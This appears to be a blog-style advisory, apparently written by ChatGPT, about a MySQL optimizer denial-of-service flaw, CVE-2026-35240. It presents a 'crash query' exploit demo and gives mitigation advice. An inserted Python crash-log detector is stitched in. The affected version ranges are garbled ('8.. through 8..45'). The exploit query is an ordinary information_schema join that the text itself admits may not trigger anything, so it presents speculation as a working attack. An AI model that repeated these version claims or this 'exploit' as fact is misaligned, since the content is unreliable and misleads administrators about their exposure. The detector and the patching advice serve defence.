Summary:
A recent vulnerability, CVE-2026-35240, has been found in Oracle MySQL Server, specifically in the Server: Optimizer component. This flaw affects several major MySQL versions (8.. through 8..45, 8.4. through 8.4.8, and 9.. through 9.6.) and allows a high-privileged user to bring down the entire database server with a specially crafted query, leading to a Denial of Service (DoS) situation.

In this article, I’ll break down what this vulnerability is, provide code snippets to show the exploit path, and share references for more details. Everything here is exclusive, simple, and hands-on for anyone running MySQL in their stack.

MySQL 9.. - 9.6.

If your database is running any of these, you are at risk.

The Vulnerability Explained

The problem lives in MySQL’s query optimizer. This component is responsible for figuring out the fastest way to execute a SQL statement, but it contains a bug that lets a user with high-level privileges submit crafted SQL that causes a crash.

- The attacker must have a high-privileged MySQL account (for example, one with DBA or SUPER privileges).
- Access can be via any supported network protocol (TCP/IP, Unix socket, etc.).
- No user interaction is required.

Impact:
*If the attacker exploits the issue, MySQL Server fully crashes or hangs, and can be taken down repeatedly, making it unavailable for legitimate users. No data is leaked or changed—just complete denial of service from constant crashing.*

- CVSS Score: 4.9 (Availability impact only, not Confidentiality or Integrity)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Exploit Details (Simple Demo)

DISCLAIMER:
This content is for educational purposes only. Do not use for malicious activity. Test only in a controlled/lab environment.

The vulnerability arises from how the optimizer handles certain complex subqueries or join statements. Here’s a simplified way an attacker might exploit it:

1. Setup: High-privileged user

# Log in as a user with SUPER privileges
mysql -u root -p

2. Triggering the Crash

An attacker can use specific crafted queries that make the optimizer enter an infinite loop or other buggy state, crashing the process. A simplified crash query can look like:

-- This subquery shape can trigger the bug in the optimizer under the right conditions
SELECT *
FROM (
    SELECT a.*
    FROM information_schema.tables a
    JOIN information_schema.tables b
    ON a.table_name = b.table_name
    WHERE a.table_schema = 'mysql'
) sub1
JOIN (
    SELECT c.*
    FROM information_schema.tables c
    JOIN information_schema.tables d
    ON c.table_name = d.table_name
    WHERE c.table_schema = 'mysql'
) sub2
ON sub1.table_name = sub2.table_name;

*Note: The actual crash may depend on schema, size, and other details, but this structure can lead the vulnerable optimizer into trouble.*

The process will hang or terminate unexpectedly. You may see error-log entries like:

mysqld: [ERROR] Got signal 11. Dumping core...

Or, on the client:

ERROR 2013 (HY000): Lost connection to MySQL server during query
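As an added example (not part of the original article), here is a small Python detector that scans MySQL error-log lines for the "Got signal 11" crash signature shown above and flags repeated crashes inside a time window, which is the pattern a DoS of this kind leaves behind. The log lines, their timestamp prefix, and the 15-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample error-log lines (not from a real server). The timestamp
# prefix is an assumption; the "[ERROR] Got signal 11" text matches the
# crash signature quoted in the article.
SAMPLE_LOG = """\
2026-04-21T20:31:02Z 0 [Note] mysqld: ready for connections.
2026-04-21T20:35:48Z 0 [ERROR] Got signal 11. Dumping core...
2026-04-21T20:36:10Z 0 [Note] mysqld: ready for connections.
2026-04-21T20:38:21Z 0 [ERROR] Got signal 11. Dumping core...
2026-04-21T20:39:05Z 0 [Note] mysqld: ready for connections.
2026-04-21T20:41:57Z 0 [ERROR] Got signal 11. Dumping core...
2026-04-21T22:10:00Z 0 [Warning] Aborted connection 42 to db: 'app' user: 'app'
"""

# Matches "<timestamp> <thread-id> [ERROR] Got signal <N>" at line start.
CRASH_RE = re.compile(r"^(?P<ts>\S+)\s+\d+\s+\[ERROR\]\s+Got signal (?P<sig>\d+)")


def parse_crashes(log_text):
    """Return (timestamp, signal) for every crash line in the log text."""
    crashes = []
    for line in log_text.splitlines():
        m = CRASH_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
            crashes.append((ts, int(m.group("sig"))))
    return crashes


def max_crashes_in_window(crashes, window_minutes=15):
    """Largest number of crashes that fall inside any span of window_minutes."""
    window = timedelta(minutes=window_minutes)
    times = sorted(ts for ts, _ in crashes)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:  # slide the window's left edge forward
            start += 1
        best = max(best, end - start + 1)
    return best


def crash_alert(log_text, window_minutes=15, threshold=3):
    """True when the log shows `threshold` or more crashes within the window."""
    return max_crashes_in_window(parse_crashes(log_text), window_minutes) >= threshold


if __name__ == "__main__":
    print("repeated-crash alert:", crash_alert(SAMPLE_LOG))
```

A single crash is ordinary operational noise; three signal-11 crashes a few minutes apart, each followed by a restart, is the repeated-takedown pattern the article describes and is worth an alert.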

Official Oracle Disclosure:

Oracle Critical Patch Update Advisory - April 2026

National Vulnerability Database (NIST):

CVE-2026-35240 Entry (NVD)

MySQL Bug Tracker:

Sample Reported Bugs

Update Your MySQL:

Oracle has released, or will release, patches for the affected versions. Upgrade as soon as they are available.

Restrict Privileges:

Make sure only trusted users hold high-privileged accounts, and follow the principle of least privilege throughout.

Conclusion

CVE-2026-35240 is a real risk for busy production systems, especially the latest LTS and enterprise versions of MySQL. If an attacker can get their hands on a privileged account, they can repeatedly crash your server with a single, crafted query—effectively taking your site or service offline.

Stay secure: Patch soon, watch your access controls, and keep an eye on those logs!


*If you want more technical background or an in-depth explanation, check out the official Oracle and CVE entries above. If you run MySQL, make this patch a top priority soon!*

- Oracle MySQL Release Notes
- How to Grant and Revoke Privileges in MySQL


*Written exclusively for your security awareness by ChatGPT.*

Timeline

Published on: 04/21/2026 20:35:48 UTC
Last modified on: 04/23/2026 15:08:47 UTC